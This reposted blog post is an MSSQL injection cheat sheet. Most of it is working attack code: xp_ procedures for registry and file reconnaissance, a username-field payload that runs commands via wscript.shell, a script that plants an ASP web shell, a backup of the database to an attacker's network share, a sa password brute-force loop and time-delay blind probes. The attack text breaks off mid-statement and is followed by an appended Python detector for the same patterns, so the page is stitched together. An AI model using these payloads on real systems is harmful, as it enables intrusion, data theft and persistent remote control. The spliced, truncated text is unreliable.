MSSQL injection

xiaoxiao2021-04-05  327

Some useful extended stored procedures:

xp_regaddmultistring, xp_regremovemultistring - add / remove a multi-string registry value
xp_regdeletekey - delete a registry key
xp_regdeletevalue - delete a registry value
xp_regenumkeys, xp_regenumvalues - enumerate registry keys / values
xp_regread, xp_regwrite - read / write the registry
xp_availablemedia - list drives
xp_dirtree - list a directory tree
xp_enumdsn - list ODBC data sources
xp_loginconfig - some of the server's security configuration
xp_makecab - package files into a cabinet (some of these need dbo rights; very useful)
xp_ntsec_enumdomains - enumerate domain names
xp_terminate_process - terminate a process by PID
xp_logininfo - the current login account
sp_configure - retrieve server configuration from the database (I think this is useful)
sp_helpextendedproc - list all extended stored procedures
sp_who2 - logged-in users, the hosts they connect from, and what they are executing in the database

Some network-related information, for example:

    exec xp_regread HKEY_LOCAL_MACHINE, 'SYSTEM\CurrentControlSet\Services\lanmanserver\parameters', 'nullsessionshares'

SNMP community strings help with mapping the network:

    exec xp_regenumvalues HKEY_LOCAL_MACHINE, 'SYSTEM\CurrentControlSet\Services\snmp\parameters\validcommunities'

Start system services, such as Telnet, in the hope that the system runs them with administrative rights:

    exec master..xp_servicecontrol 'start', 'schedule'
    exec master..xp_servicecontrol 'start', 'server'

Register an extended stored procedure from a DLL; the new procedure can then be executed:

    sp_addextendedproc 'xp_webserver', 'c:\temp\xp_foo.dll'

The BULK INSERT syntax inserts a text file into a temporary table. Simply create the table:

    create table foo (line varchar(8000))

then run BULK INSERT to load the file's contents into it, for example:

    bulk insert foo from 'c:\inetpub\wwwroot\admin\inc.asp'

bcp writes query output to a file:

    bcp "select * from text..foo" queryout c:\inetpub\wwwroot\runcommand.asp -c -Slocalhost -Usa -Pfoobar

The -S parameter is the server on which to execute the query, -U is the user name and -P is the password, in this case 'foobar'.

Several built-in stored procedures allow the creation of ActiveX automation scripts in SQL Server. These are functionally the same as scripts running under the Windows Script Host or as ASP scripts: they are written in VBScript or JavaScript, and they create automation objects and interact with them.

An automation script written this way can do, from Transact-SQL, anything an ASP script or a WSH script can do. This example uses the 'wscript.shell' object:

    declare @o int
    exec sp_oacreate 'wscript.shell', @o out
    exec sp_oamethod @o, 'run', NULL, 'notepad.exe'

It can be submitted through a username field:

    username: '; declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'notepad.exe'--

Read a known text file using the FileSystemObject:

    declare @o int, @f int, @t int, @ret int
    declare @line varchar(8000)
    exec sp_oacreate 'scripting.filesystemobject', @o out
    exec sp_oamethod @o, 'opentextfile', @f out, 'c:\boot.ini', 1
    exec @ret = sp_oamethod @f, 'readline', @line out
    while (@ret = 0)
    begin
        print @line
        exec @ret = sp_oamethod @f, 'readline', @line out
    end

Create an ASP page that executes the command submitted to it. It runs as the user the ASP runs as (by default), and this requires the sp_oacreate extension to exist:

    declare @o int, @f int, @t int, @ret int
    exec sp_oacreate 'scripting.filesystemobject', @o out
    exec sp_oamethod @o, 'createtextfile', @f out, 'c:\inetpub\wwwroot\foo.asp', 1
    exec @ret = sp_oamethod @f, 'writeline', NULL, '<% set o = server.createobject("wscript.shell"): o.run( request.querystring("cmd") ) %>'

Other useful statements:

    sp_who '1'
    select * from sysobjects

For penetration within a local area network, back up the database (this also works for non-sa users):

    declare @a sysname
    select @a = db_name()
    backup database @a to disk = '\\yourIP\yourshare\bak.dat', name = 'test'
    -- backs up the current database to your disk

Query a remote server through OpenRowSet (this needs more than the default configuration allows; the password below is a placeholder):

    select * from openrowset('sqloledb', 'myserver';'sa';'<sa password>', 'select * from table')

sp_addsrvrolemember adds a login as a member of a fixed server role.

sp_addsrvrolemember

Syntax

    sp_addsrvrolemember [@loginame =] 'login', [@rolename =] 'role'

Arguments

[@loginame =] 'login' is the name of the login being added to the fixed server role. login is sysname, with no default. It can be a Microsoft SQL Server login or a Microsoft Windows NT user account. If the Windows NT user account has not yet been granted access to SQL Server, it is granted access automatically.

[@rolename =] 'role' is the name of the fixed server role the login is being added to. role is sysname, with a default of NULL, and must be one of: sysadmin, securityadmin, serveradmin, setupadmin, processadmin, diskadmin, dbcreator, bulkadmin.

Return code values: 0 (success) or 1 (failure).

Remarks: when a login is added to a fixed server role, it receives the permissions associated with that role. The role membership of the sa login cannot be changed. Use sp_addrolemember to add a member to a fixed database role or a user-defined role. sp_addsrvrolemember cannot be executed within a user-defined transaction.

Permissions: members of the sysadmin fixed server role can add members to any fixed server role. Members of a fixed server role can execute sp_addsrvrolemember to add members only to that same fixed server role.

Example: the following adds the Windows NT user Corporate\HelenS to the sysadmin fixed server role.

    exec sp_addsrvrolemember 'Corporate\HelenS', 'sysadmin'

OpenDataSource

Provides ad hoc connection information as part of a four-part object name, without using a linked server name.

Syntax

    OpenDataSource(provider_name, init_string)

Arguments

provider_name is the name registered as the PROGID of the OLE DB provider used to access the data source. provider_name is char, with no default.

init_string is the connection string passed to the IDataInitialize interface of the destination provider. The provider string syntax is based on keyword=value pairs separated by semicolons, for example "keyword1=value;keyword2=value". The basic syntax is defined in the Microsoft Data Access SDK; for the specific keyword values a provider supports, see that provider's documentation. The table below lists the most commonly used keywords in init_string.

    Keyword              OLE DB property              Valid values and description
    Data Source          DBPROP_INIT_DATASOURCE       Name of the data source to connect to. Providers interpret this differently: for the SQL Server OLE DB provider it is the server name; for the Jet OLE DB provider it is the full path of the .mdb or .xls file.
    Location             DBPROP_INIT_LOCATION         Location of the database to connect to.
    Extended Properties  DBPROP_INIT_PROVIDERSTRING   Provider-specific connection string.
    Connect timeout      DBPROP_INIT_TIMEOUT          Timeout value after which the connection attempt fails.
    User ID              DBPROP_AUTH_USERID           User ID to use for the connection.
    Password             DBPROP_AUTH_PASSWORD         Password to use for the connection.
    Catalog              DBPROP_INIT_CATALOG          Name of the initial or default catalog when connecting to the data source.

Remarks: OpenDataSource can be used in the same Transact-SQL syntax locations as a linked server name. It can therefore be the first part of a four-part name that refers to a table or view in a SELECT, INSERT, UPDATE or DELETE statement, or to a remote stored procedure in an EXECUTE statement; when executing a remote stored procedure, OpenDataSource should refer to another SQL Server. OpenDataSource does not accept variables for its arguments. Like OpenRowSet, OpenDataSource should only reference OLE DB data sources that are accessed infrequently; for any data source accessed more than a few times, define a linked server. Neither OpenDataSource nor OpenRowSet provides all of the functionality of a linked server definition, such as security management and the ability to query catalog information, and all connection information, including passwords, must be supplied on every call.

Example: the following accesses data from a table in another instance of SQL Server.

    select * from OpenDataSource('SQLOLEDB', 'Data Source=ServerName;User ID=MyUID;Password=MyPass').Northwind.dbo.Categories

The next example queries an Excel spreadsheet through the OLE DB provider for Jet.

    select * from OpenDataSource('Microsoft.Jet.OLEDB.4.0', 'Data Source="c:\Finance\account.xls";User ID=Admin;Password=;Extended properties=Excel 5.0')...xactions

Built as a stored procedure over the msdasql provider; in black-box testing it appears no different from an ordinary injection:

    declare @username nvarchar(4000), @query nvarchar(4000)
    declare @pwd nvarchar(4000), @char_set nvarchar(4000)
    declare @pwd_len int, @i int, @c char
    select @char_set = N'abcdefghijklmnopqrstuvwxyz0123456789_'
    select @pwd_len = 8
    select @username = 'sa'
    while @i < @pwd_len
    begin
        -- make pwd (code deleted)
        -- try a login
        select @query = N'select * from openrowset(''msdasql'', ''driver={sql server};server=;uid=' + @username + N';pwd=' + @pwd + N''', ''select @@version'')'
        exec xp_execresultset @query, N'master'
        -- check for success
        -- increment the password (code deleted)
    end

Blind techniques, time delay (you can add a loop: the longer a query takes, the more it says the current field value is correct):

    if (select user) = 'sa' waitfor delay '0:0:5'
    if exists (select * from pubs..pub_info) waitfor delay '0:0:5'
    create table pubs..tmp_file (is_file int, is_dir int, has_parent int)
    insert into pubs..tmp_file exec master..xp_fileexist 'c:\boot.ini'
    if exists (select * from pubs..tmp_file) waitfor delay '0:0:5'
    if (select is_file from pubs..tmp_file) > 0 waitfor delay '0:0:5'

Character comparison, one bit at a time:

    if (ascii(substring(@s, @byte, 1)) & (power(2, @bit))) > 0 waitfor delay '0:0:5'
    declare @s varchar(8000)
    select @s =
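As an added, defender-side example (not code from the original post): a small Python triage routine that scans statements captured from an application's SQL log for the capabilities this page catalogues, the registry and file xp_* procedures, OLE automation through sp_oacreate/sp_oamethod, ad hoc remote queries through OpenRowSet/OpenDataSource/BULK INSERT, the WAITFOR DELAY shape of the time-delay blind probes, and the quote-terminate-then-comment shape of the username payload. The sample statements are constructed, and the grouping into categories is this example's own.

```python
import re

# Procedures this page catalogues, grouped by the capability they expose.
# The names are real SQL Server procedures; the grouping is this example's own.
RISKY_PROCS = {
    "registry": {"xp_regread", "xp_regwrite", "xp_regenumkeys", "xp_regenumvalues",
                 "xp_regdeletekey", "xp_regdeletevalue", "xp_regaddmultistring",
                 "xp_regremovemultistring"},
    "filesystem": {"xp_dirtree", "xp_fileexist", "xp_availablemedia", "xp_makecab"},
    "ole_automation": {"sp_oacreate", "sp_oamethod", "sp_oagetproperty", "sp_oasetproperty"},
    "service_control": {"xp_servicecontrol", "xp_terminate_process"},
    "server_extension": {"sp_addextendedproc", "sp_addsrvrolemember"},
    "recon": {"xp_enumdsn", "xp_loginconfig", "xp_ntsec_enumdomains", "xp_logininfo",
              "sp_helpextendedproc", "sp_who2"},
}
PROC_RE = re.compile(r"\b((?:xp|sp)_[a-z0-9_]+)", re.I)            # xp_foo / sp_foo
REMOTE_RE = re.compile(r"\b(openrowset|opendatasource|bulk\s+insert)\b", re.I)
DELAY_RE = re.compile(r"\bwaitfor\s+delay\b", re.I)               # time-delay blind probe
BREAKOUT_RE = re.compile(r"';.*--", re.S)                         # quote-terminate ... comment

def analyze(sql: str) -> dict:
    """Classify one captured T-SQL statement (or injected payload) by risky capability."""
    found = set()
    for name in {m.group(1).lower() for m in PROC_RE.finditer(sql)}:
        found.update(cat for cat, procs in RISKY_PROCS.items() if name in procs)
    if REMOTE_RE.search(sql):
        found.add("adhoc_remote")
    if DELAY_RE.search(sql):
        found.add("time_delay_probe")
    if BREAKOUT_RE.search(sql):
        found.add("stacked_injection")
    return {"risky": bool(found), "categories": sorted(found)}

# Constructed sample statements (not real captures); the first two are benign.
SAMPLE_QUERIES = [
    "select name, email from users where id = 42",
    "update orders set status = 'shipped' where id = 7",
    "'; declare @o int exec sp_oacreate 'wscript.shell', @o out "
    "exec sp_oamethod @o, 'run', null, 'notepad.exe'--",
    "if (select user) = 'sa' waitfor delay '0:0:5'",
    "exec xp_regread HKEY_LOCAL_MACHINE, 'SYSTEM\\CurrentControlSet\\Services"
    "\\lanmanserver\\parameters', 'nullsessionshares'",
    "select * from openrowset('msdasql', 'driver={sql server};server=;uid=sa;pwd=', "
    "'select @@version')",
]

def scan(queries):
    """Return (index, categories) for each statement that touches a risky capability."""
    results = [(i, analyze(q)) for i, q in enumerate(queries)]
    return [(i, r["categories"]) for i, r in results if r["risky"]]
```

Running scan(SAMPLE_QUERIES) flags statements 2 to 5 and leaves the two ordinary application queries alone; in practice the same rule belongs on the connection the web application uses, where none of these capabilities should appear at all.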

Please credit the original address when reposting: https://www.9cbs.com/read-132240.html
